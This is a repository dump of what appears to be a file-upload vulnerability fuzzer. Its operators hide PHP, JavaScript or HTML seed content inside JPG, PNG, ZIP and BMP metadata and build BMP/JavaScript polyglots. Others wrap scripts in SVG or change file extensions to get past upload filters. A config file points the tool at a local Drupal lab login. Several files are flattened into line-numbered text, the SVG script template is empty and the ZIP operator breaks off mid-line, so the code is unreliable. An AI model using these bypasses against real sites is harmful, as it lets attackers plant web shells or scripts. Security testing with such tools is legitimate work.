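    __exclusion_op__ = {'php':['M09','M01_GIF', 'M01_JPG', 'M01_PDF', 'M01_PNG', 'M01_TAR_GZ', 'M01_ZIP', 'M02_GIF', 'M02_JPG', 'M02_JSBMP', 'M02_JSGIF', 'M02_PDF', 'M02_PNG', 'M02_ZIP'], 'html':['M01_GIF', 'M01_JPG', 'M01_PDF', 'M01_PNG', 'M01_TAR_GZ', 'M01_ZIP','M02_GIF', 'M02_JPG', 'M02_JSBMP', 'M02_JSGIF', 'M02_PDF', 'M02_PNG', 'M02_ZIP','M04_ACE','M04_ARC','M04_ARJ','M04_BZ2','M04_DFXP','M04_EPUB','M04_GPX','M04_GZIP','M04_M4V','M04_MPA','M04_MPP','M04_NUMBERS','M04_ONETOC','M04_OXPS','M04_PAGES','M04_WP','M04_WRI','M04_XHT','M04_XLA','M04_XLW','M04_XPS','M04_ZIPX','M06','M07','M08','M09','M10']}#['M01_JPG', 'M01_PNG', 'M01_GIF', 'M01_ZIP', 'M01_TAR_GZ', 'M01_PDF', 'M02_PNG', 'M02_GIF', 'M02_ZIP', 'M02_PDF', 'M02_JSBMP', 'M02_JSGIF', 'M06', 'M08', 'M10','M07_OTHER'] # ([classname])when this op used for mutation,
    # operations in this list can be used to extra mutation.
    __resource__ = {"jpg":""}  # ({type:resource filename})
    __seed_dependency__ = __exclusion_op__.keys()  # ["php","html"]  # seed file dependency for operation

    def operation(self, output, seed_file, resource_file=None):
        """Embed the seed content in ./resource/test.jpg as an 0xFFFE segment.

        The segment is: marker 0xFF 0xFE, a 2-byte big-endian length of
        len(content) + 3, the seed content, and one NUL byte. '_M2JPG' is
        appended to the file name. resource_file and __resource__ are not
        consulted; the template path is relative to the working directory.

        Raises struct.error when len(content) + 3 does not fit in 16 bits.
        """
        payload = output['content']
        segment = b'\xFF\xFE' + struct.pack('>H', len(payload) + 3) + payload + b'\x00'
        with open('./resource/test.jpg', 'rb') as jpg_file:
            template = jpg_file.read()
        # Bytes 4-5 of the template are read as a big-endian length; the new
        # segment is spliced in 4 bytes past that value.
        inject_at = struct.unpack('>H', template[4:6])[0] + 4
        output['content'] = template[:inject_at] + segment + template[inject_at:]

        # NOTE(review): this file imports only mutation_op and struct;
        # `utils` presumably arrives through the star import - confirm.
        base_name = output['filename']
        if base_name is None or len(base_name) == 0:
            base_name = utils.extract_filename(seed_file)
        output['filename'] = base_name + '_M2JPG'

--------------------------------------------------------------------------------
/mutation_op/m02_jsbmp.py:
--------------------------------------------------------------------------------
from mutation_op import *
import struct

class mOP(MutationOP):
    __comment__ = "Mutation2 : set seed in resource file as metadata"
    __mutate_type__ = "file"  # (file|request) ; type of target
    __exclusion_op__ = {'js':['M02_GIF', 'M02_JPG', 'M02_JSBMP', 'M02_JSGIF', 'M02_PDF', 'M02_PNG', 'M02_ZIP','M04_GIF','M04_JPG','M04_PNG']}#['M01_JPG', 'M01_PNG', 'M01_GIF', 'M01_ZIP', 'M01_TAR_GZ', 'M01_PDF', 'M02_JPG', 'M02_PNG', 'M02_GIF', 'M02_ZIP', 'M02_PDF', 'M02_JSGIF', 'M06', 'M08','M10'] # ([classname])when this op used for mutation,
    # operations in this list can be used to extra mutation.
    __resource__ = {}  # ({type:resource filename})
    __seed_dependency__ = __exclusion_op__.keys()  # ["js"]  # seed file dependency for operation


    def operation(self, output, seed_file, resource_file=None):
        """Rewrite ./resource/test.bmp around the seed content.

        Every 0x2A 0x2F pair in the template is zeroed, bytes 2-3 are
        replaced with 0x2F 0x2A, and 0xFF 0x2A 0x2F 0x3D 0x31 0x3B plus the
        seed content are appended. '_M2JSBMP' is appended to the file name.
        resource_file is not used; the template path is relative to the
        working directory.
        """
        # Read as bytes, like the other M2 operators: the data is handled
        # with bytes operations below and must not go through text decoding
        # or newline translation.
        with open('./resource/test.bmp', 'rb') as bmp_file:
            data = bmp_file.read()

        data = data.replace(b'\x2A\x2F', b'\x00\x00')

        output['content'] = data[0:2] + b'\x2F\x2A' + data[4:] + b'\xFF\x2A\x2F\x3D\x31\x3B' + output['content']

        # NOTE(review): this file imports only mutation_op and struct;
        # `utils` presumably arrives through the star import - confirm.
        base_name = output['filename']
        if base_name is None or len(base_name) == 0:
            base_name = utils.extract_filename(seed_file)
        output['filename'] = base_name + '_M2JSBMP'

#============================================================================================================#
#======= Script Referenced from : https://pastebin.com/04y7ee3u =============================================#
#============================================================================================================#
# Basic principle: make the header file-size field \x2f\x2a\x00\x00 (the same as /*) and append */=1; to the end of the mutated bmp.
# In JavaScript this reads as BM/* blah blah */=1;, so it is not a JavaScript syntax error. It also keeps the bmp structure.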
36 | -------------------------------------------------------------------------------- /mutation_op/m04_zip.py: -------------------------------------------------------------------------------- 1 | from mutation_op import * 2 | import utils 3 | 4 | class mOP(MutationOP): 5 | __comment__ = "Mutation4: Change Extensions to Mutation Resource File" 6 | __mutate_type__ = "file" # (file|request) ; type of target 7 | __exclusion_op__ = {'php':['M12_ZIP','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M07','M10'],'js':['M12_ZIP','M10','M07','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX']}#['M04_JPG', 'M04_PNG', 'M04_GIF', 'M04_TAR_GZ', 'M04_PDF', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHAR', 'M04_PHT', 'M04_PHTML', 'M04_TXT', 'M06', 'M07_PHP', 'M07_OTHER', 'M08', 'M10'] # ([classname])when this op used for mutation, 8 | # operations in this list can be used to extra mutation. 
# class mOP body, continued (/mutation_op/m04_zip.py)
    __resource__ = {}  # ({type:resource filename})
    __seed_dependency__ = __exclusion_op__.keys()  # ["php","js"]  # seed file dependency for operation

    def operation(self, output, seed_file, resource_file=None):
        """Rename the output to '<name>_M4ZIP' and make 'zip' its last extension.

        Only output['filename'] and output['fileext'] are written;
        output['content'] and resource_file are not touched.
        """
        base_name = output['filename']
        if base_name is None or len(base_name) == 0:
            # No name chosen yet: derive one from the seed file.
            base_name = utils.extract_filename(seed_file)
        output['filename'] = base_name + '_M4ZIP'

        current_ext = output['fileext']
        if '.' in current_ext:
            # Multi-part extension: keep everything before the last dot.
            output['fileext'] = current_ext.rsplit('.', 1)[0] + '.zip'
        else:
            output['fileext'] = 'zip'

--------------------------------------------------------------------------------
/mutation_op/m04_tar_gz.py:
--------------------------------------------------------------------------------
from mutation_op import *
import utils

class mOP(MutationOP):
    __comment__ = "Mutation4: Change Extensions to Mutation Resource File"
    __mutate_type__ = "file"  # (file|request) ; type of target
    __exclusion_op__ = {'php':['M12_TAR_GZ','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M07','M10'],'js':['M12_TAR_GZ','M10','M07','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX']}#['M04_JPG', 'M04_PNG', 'M04_GIF', 'M04_ZIP', 'M04_PDF', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHAR', 'M04_PHT', 'M04_PHTML', 'M04_TXT', 'M06', 'M07_PHP', 'M07_OTHER', 'M08', 'M10'] # ([classname])when this op used for mutation,
    # operations in this list can be used to extra mutation.
    __resource__ = {}  # ({type:resource filename})
    __seed_dependency__ = __exclusion_op__.keys()  # ["php","js"]  # seed file dependency for operation

    def operation(self, output, seed_file, resource_file=None):
        """Rename the output to '<name>_M4TARGZ' and make 'tar.gz' its last extension.

        Only output['filename'] and output['fileext'] are written;
        output['content'] and resource_file are not touched.
        """
        base_name = output['filename']
        if base_name is None or len(base_name) == 0:
            # No name chosen yet: derive one from the seed file.
            base_name = utils.extract_filename(seed_file)
        output['filename'] = base_name + '_M4TARGZ'

        current_ext = output['fileext']
        if '.' in current_ext:
            # Multi-part extension: keep everything before the last dot.
            output['fileext'] = current_ext.rsplit('.', 1)[0] + '.tar.gz'
        else:
            output['fileext'] = 'tar.gz'

--------------------------------------------------------------------------------
/mutation_op/m04_txt.py:
--------------------------------------------------------------------------------
from mutation_op import *
import utils

class mOP(MutationOP):
    __comment__ = "Mutation4: Change Extensions to Mutation Resource File"
    __mutate_type__ = "file"  # (file|request) ; type of target
    __exclusion_op__ = {'js':['M12_TXT','M10','M07','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX']}#['M04_JPG', 'M04_GIF', 'M04_ZIP', 'M04_TAR_GZ', 'M04_PDF', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHAR', 'M04_PHT', 'M04_PHTML', 'M04_PNG', 'M06', 'M07_PHP', 'M07_OTHER', 'M08', 'M10'] # ([classname])when this op used for mutation,

    #php':['M12_TXT','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M07','M10'],
    # operations in this list can be used to extra mutation.
    __resource__ = {}  # ({type:resource filename})
    # The 'php' entry above is commented out, so keys() yields only 'js' here.
    __seed_dependency__ = __exclusion_op__.keys()  # ["js","php"]  # seed file dependency for operation

    def operation(self, output, seed_file, resource_file=None):
        """Rename the output to '<name>_M4TXT' and make 'txt' its last extension.

        Only output['filename'] and output['fileext'] are written;
        output['content'] and resource_file are not touched.
        """
        base_name = output['filename']
        if base_name is None or len(base_name) == 0:
            # No name chosen yet: derive one from the seed file.
            base_name = utils.extract_filename(seed_file)
        output['filename'] = base_name + '_M4TXT'

        current_ext = output['fileext']
        if '.' in current_ext:
            # Multi-part extension: keep everything before the last dot.
            output['fileext'] = current_ext.rsplit('.', 1)[0] + '.txt'
        else:
            output['fileext'] = 'txt'

--------------------------------------------------------------------------------
/mutation_op/m04_pdf.py:
--------------------------------------------------------------------------------
from mutation_op import *
import utils

class mOP(MutationOP):
    __comment__ = "Mutation4: Change Extensions to Mutation Resource File"
    __mutate_type__ = "file"  # (file|request) ; type of target
    __exclusion_op__ = {'php':['M12_HTML','M12_XHTML','M12_PDF','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP',
'M04_ZIPX','M07','M10'],'js':['M12_HTML','M12_XHTML','M12_PDF','M10','M07','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX']}#['M04_JPG', 'M04_PNG', 'M04_GIF', 'M04_ZIP', 'M04_TAR_GZ', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHAR', 'M04_PHT', 'M04_PHTML', 'M04_TXT', 'M06', 'M07_PHP', 'M07_OTHER', 'M08', 'M10'] # ([classname])when this op used for mutation,
    # operations in this list can be used to extra mutation.
    __resource__ = {}  # ({type:resource filename})
    __seed_dependency__ = __exclusion_op__.keys()  # ["php","js"]  # seed file dependency for operation

    def operation(self, output, seed_file, resource_file=None):
        """Rename the output to '<name>_M4PDF' and make 'pdf' its last extension.

        Only output['filename'] and output['fileext'] are written;
        output['content'] and resource_file are not touched.
        """
        base_name = output['filename']
        if base_name is None or len(base_name) == 0:
            # No name chosen yet: derive one from the seed file.
            base_name = utils.extract_filename(seed_file)
        output['filename'] = base_name + '_M4PDF'

        current_ext = output['fileext']
        if '.' in current_ext:
            # Multi-part extension: keep everything before the last dot.
            output['fileext'] = current_ext.rsplit('.', 1)[0] + '.pdf'
        else:
            output['fileext'] = 'pdf'

--------------------------------------------------------------------------------
/mutation_op/m02_png.py:
--------------------------------------------------------------------------------
from mutation_op import *
import struct
import zlib

class mOP(MutationOP):
    __comment__ = "Mutation2 : set seed in resource file as metadata"
    __mutate_type__ = "file"  # (file|request) ; type of target
    __exclusion_op__ = {'php':['M09','M01_GIF', 'M01_JPG', 'M01_PDF', 'M01_PNG', 'M01_TAR_GZ', 'M01_ZIP', 'M02_GIF', 'M02_JPG', 'M02_JSBMP', 'M02_JSGIF', 'M02_PDF', 'M02_PNG', 'M02_ZIP'], 'html':['M01_GIF', 'M01_JPG', 'M01_PDF', 'M01_PNG', 'M01_TAR_GZ', 'M01_ZIP','M02_GIF', 'M02_JPG', 'M02_JSBMP', 'M02_JSGIF', 'M02_PDF', 'M02_PNG', 'M02_ZIP','M04_ACE','M04_ARC','M04_ARJ','M04_BZ2','M04_DFXP','M04_EPUB','M04_GPX','M04_GZIP','M04_M4V','M04_MPA','M04_MPP','M04_NUMBERS','M04_ONETOC','M04_OXPS','M04_PAGES','M04_WP','M04_WRI','M04_XHT','M04_XLA','M04_XLW','M04_XPS','M04_ZIPX','M06','M07','M08','M09','M10']}#['M01_JPG', 'M01_PNG', 'M01_GIF', 'M01_ZIP', 'M01_TAR_GZ', 'M01_PDF', 'M02_JPG', 'M02_GIF', 'M02_ZIP', 'M02_PDF', 'M02_JSBMP', 'M02_JSGIF', 'M06', 'M08', 'M10', 'M07_OTHER'] # ([classname])when this op used for mutation,
    # operations in this list can be used to extra mutation.
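# class mOP body, continued (/mutation_op/m02_png.py)
    __resource__ = {"jpg":""}  # ({type:resource filename})
    __seed_dependency__ = __exclusion_op__.keys()  # ["php","html"]  # seed file dependency for operation

    def operation(self, output, seed_file, resource_file=None):
        """Embed the seed content in ./resource/test.png as a tEXt chunk.

        The chunk is: 4-byte big-endian length (8 + len(content)), the type
        'tEXt', the keyword 'Comment' plus NUL, the seed content, and a
        CRC32 over type and data. It is spliced in 4 bytes before the first
        'IEND' found in the template. '_M2PNG' is appended to the file name.
        resource_file and __resource__ are not consulted; the template path
        is relative to the working directory.

        Raises ValueError when the template contains no 'IEND' marker.
        """
        payload = output['content']
        chunk_body = b''.join([b'tEXt', b'Comment\x00', payload])
        chunk = b''.join([
            struct.pack('>I', 8 + len(payload)),
            chunk_body,
            struct.pack('>I', zlib.crc32(chunk_body) & 0xffffffff),
        ])
        with open('./resource/test.png', 'rb') as png_file:
            data = png_file.read()
        # Search with a bytes needle: the template is read in binary mode, and
        # a text needle fails on Python 3 (same result on Python 2).
        injectpoint = data.index(b'IEND') - 4

        output['content'] = data[:injectpoint] + chunk + data[injectpoint:]

        # NOTE(review): this file imports only mutation_op, struct and zlib;
        # `utils` presumably arrives through the star import - confirm.
        base_name = output['filename']
        if base_name is None or len(base_name) == 0:
            base_name = utils.extract_filename(seed_file)
        output['filename'] = base_name + '_M2PNG'

--------------------------------------------------------------------------------
/mutation_op/m08.py:
--------------------------------------------------------------------------------
from mutation_op import *
import utils

class mOP(MutationOP):
    __comment__ = "Mutation 8: Insert scripts in SVG file"
    __mutate_type__ = "file"  # (file|request) ; type of target

    # XXX: Fill the exclusion operator and seed dependency
    __exclusion_op__ = {'html':['M01_GIF', 'M01_JPG', 'M01_PDF', 'M01_PNG', 'M01_TAR_GZ', 'M01_ZIP', 'M02_GIF', 'M02_JPG', 'M02_JSBMP', 'M02_JSGIF', 'M02_PDF', 'M02_PNG', 'M02_ZIP', 'M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX', 'M06',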
'M07', 'M08', 'M10']} 10 | # operations in this list can be used to extra mutation. 11 | __resource__ = {""} # ({type:resource filename}) 12 | __seed_dependency__ = __exclusion_op__.keys()#['html'] # seed file dependency for operation 13 | 14 | def operation(self, output, seed_file, resource_file=None): 15 | base_headdata = """\n""" 16 | base_taildata = """\n 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | """ 27 | output['content'] = base_headdata+output['content']+base_taildata 28 | #print output['content'] 29 | if output['filename'] != None and len(output['filename']) > 0: 30 | filename = output['filename'] 31 | else: 32 | filename = utils.extract_filename(seed_file) 33 | output['filename'] = filename + '_M8' 34 | output['fileext'] = 'svg' 35 | -------------------------------------------------------------------------------- /mutation_op/m02_zip.py: -------------------------------------------------------------------------------- 1 | from mutation_op import * 2 | import struct 3 | 4 | class mOP(MutationOP): 5 | __comment__ = "Mutation2 : set seed in resource file as metadata" 6 | __mutate_type__ = "file" # (file|request) ; type of target 7 | __exclusion_op__ = {'php':['M09','M01_GIF', 'M01_JPG', 'M01_PDF', 'M01_PNG', 'M01_TAR_GZ', 'M01_ZIP', 'M02_GIF', 'M02_JPG', 'M02_JSBMP', 'M02_JSGIF', 'M02_PDF', 'M02_PNG', 'M02_ZIP'], 'html':['M01_GIF', 'M01_JPG', 'M01_PDF', 'M01_PNG', 'M01_TAR_GZ', 'M01_ZIP','M02_GIF', 'M02_JPG', 'M02_JSBMP', 'M02_JSGIF', 'M02_PDF', 'M02_PNG', 'M02_ZIP','M04_ACE','M04_ARC','M04_ARJ','M04_BZ2','M04_DFXP','M04_EPUB','M04_GPX','M04_GZIP','M04_M4V','M04_MPA','M04_MPP','M04_NUMBERS','M04_ONETOC','M04_OXPS','M04_PAGES','M04_WP','M04_WRI','M04_XHT','M04_XLA','M04_XLW','M04_XPS','M04_ZIPX','M06','M07','M08','M09','M10']}#['M01_JPG', 'M01_PNG', 'M01_GIF', 'M01_ZIP', 'M01_TAR_GZ', 'M01_PDF', 'M02_PNG', 'M02_JPG', 'M02_GIF', 'M02_PDF', 'M02_JSBMP', 'M02_JSGIF', 'M06', 'M08', 'M07_OTHER', 'M10'] # ([classname])when this op used for mutation, 8 | # 
operations in this list can be used to extra mutation. 9 | __resource__ = {"jpg":""} # ({type:resource filename}) 10 | __seed_dependency__ = __exclusion_op__.keys()#["php","html"] # seed file dependency for operation 11 | 12 | def operation(self, output, seed_file, resource_file=None): 13 | DIRENTRY_SIGN = b'\x50\x4b\x01\x02' 14 | with open('./resource/test.zip','rb') as fp: 15 | data = fp.read() 16 | 17 | direntry_root = data.index(DIRENTRY_SIGN) 18 | COMMENT_LEN = struct.pack(' 0: 27 | filename = output['filename'] 28 | else: 29 | filename = utils.extract_filename(seed_file) 30 | output['filename'] = filename + '_M2ZIP' 31 | -------------------------------------------------------------------------------- /configs/drupal-credential-nonmonitor.conf: -------------------------------------------------------------------------------- 1 | [USER_CREDENTIAL] 2 | 3 | ID = vuln_web 4 | PW = vu!nweb321 5 | WebRootPath = /var/www/html/ 6 | WebHost = http://127.0.0.1 7 | WebLoginIDName = name 8 | WebLoginPWName = pass 9 | WebLoginURL = http://127.0.0.1/drupal/user/login 10 | WebLoginPageURL = http://127.0.0.1/drupal/user/login 11 | WebLoginCSRFName = form_build_id 12 | WebLoginAdditionalValue = form_id=user_login_form;op=Log in 13 | WebLoginSuccessStr = Log out 14 | WebUploadURL = http://127.0.0.1/drupal/node/add/article?element_parents=field_image/widget/0&ajax_form=1&_wrapper_format=drupal_ajax 15 | WebUploadPageURL = http://127.0.0.1/drupal/node/add/article 16 | WebUploadFormAttr = 17 | WebUploadCustomHeader = 18 | WebUploadCSRFName = form_build_id;form_token 19 | WebUploadSuccessStr = %notin=Error# 20 | WebUploadAdditionalValue = changed=1542199556;title[0][value]=asdf;form_id=node_article_form;body[0][summary]=;body[0][value]=

asdf

;body[0][format]=basic_html;field_tags[target_id]= ;files[field_image_0]=%filebinary#;field_image[0][fids]=;field_image[0][display]=;revision_log[0][value]=;menu[title]=;menu[description]=;menu[menu_parent]=main:;menu[weight]=0;comment[0][status]=2;path[0][alias]=;uid[0][target_id]=vuln_web (1);created[0][value][date]=2018-11-14;created[0][value][time]=21:45:56;promote[value]=1;status[value]=1;_triggering_element_name=field_image_0_upload_button;_triggering_element_value=Upload;_drupal_ajax=1;ajax_page_state[theme]=seven;ajax_page_state[libraries]=big_pipe/big_pipe,ckeditor/drupal.ckeditor,ckeditor/drupal.ckeditor.plugins.drupalimagecaption,classy/base,classy/image-widget,classy/messages,comment/drupal.comment,contextual/drupal.contextual-links,contextual/drupal.contextual-toolbar,core/drupal.active-link,core/drupal.autocomplete,core/drupal.collapse,core/drupal.states,core/html5shiv,core/jquery.form,core/normalize,file/drupal.file,filter/drupal.filter,menu_ui/drupal.menu_ui,node/drupal.node,path/drupal.path,seven/global-styling,seven/node-form,shortcut/drupal.shortcut,text/drupal.text,toolbar/toolbar,toolbar/toolbar.escapeAdmin,tour/tour,user/drupal.user.icons;ajax_page_state[theme_token]=UtwM23XQvbwh_iar-YXD6V8wmQpA0LmATcZXD4U1EBU 21 | WebUploadedFileUrlPattern = http://127.0.0.1/drupal/sites/default/files/[0-9|-]{7}/.*?(?=(u0022)) 22 | WebUploadFilesURL = 23 | WebUploadFilesParameter = 24 | 25 | [DETECTOR_CONF] 26 | 27 | MutationChainLimit = 99 28 | MonitorEnable = False 29 | MonitorHost = 127.0.0.1 30 | MonitorPort = 31 | -------------------------------------------------------------------------------- /mutation_op/m04_xht.py: -------------------------------------------------------------------------------- 1 | from mutation_op import * 2 | import utils 3 | 4 | class mOP(MutationOP): 5 | __comment__ = "Mutation4: Change Extensions to Mutation Resource File" 6 | __mutate_type__ = "file" # (file|request) ; type of target 7 | __exclusion_op__ = 
{'php':['M12_HTML','M12_XHTML','M12_XHT','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M07','M10'],'xhtml':['M12_HTML','M12_XHTML','M12_XHT','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M06','M07','M08','M10'],'js':['M12_HTML','M12_XHTML','M12_XHT','M10','M07','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M13']}#['M04_JPG', 'M04_GIF', 'M04_ZIP', 'M04_TAR_GZ', 'M04_PDF', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHAR', 'M04_PHT', 'M04_PHTML', 'M04_PNG', 'M04_TXT', 'M07_PHP', 'M07_OTHER', 'M10'] # ([classname])when this op used for mutation, 8 | # operations in this list can be used to extra mutation. 
__resource__ = {} # ({type:resource filename})
__seed_dependency__ = __exclusion_op__.keys()#["html"] # seed file dependency for operation

def operation(self, output, seed_file, resource_file=None):
    """Retag the mutated upload with the ``xht`` extension.

    ``output`` is mutated in place; nothing is returned.  The content is not
    touched here.

    * ``output['filename']`` becomes the existing name (or, when that is
      None/empty, the name derived from ``seed_file``) with ``_M4XHT``
      appended.
    * ``output['fileext']`` is overwritten with ``'xht'``.

    ``resource_file`` is accepted but not used.
    """
    existing = output['filename']
    if existing != None and len(existing) > 0:
        stem = existing
    else:
        stem = utils.extract_filename(seed_file)

    output['filename'] = stem + '_M4XHT'
    output['fileext'] = 'xht'

--------------------------------------------------------------------------------
/mutation_op/m02_gif.py:
--------------------------------------------------------------------------------
from mutation_op import *
import struct

class mOP(MutationOP):
    __comment__ = "Mutation2 : set seed in resource file as metadata"
    __mutate_type__ = "file" # (file|request) ; type of target
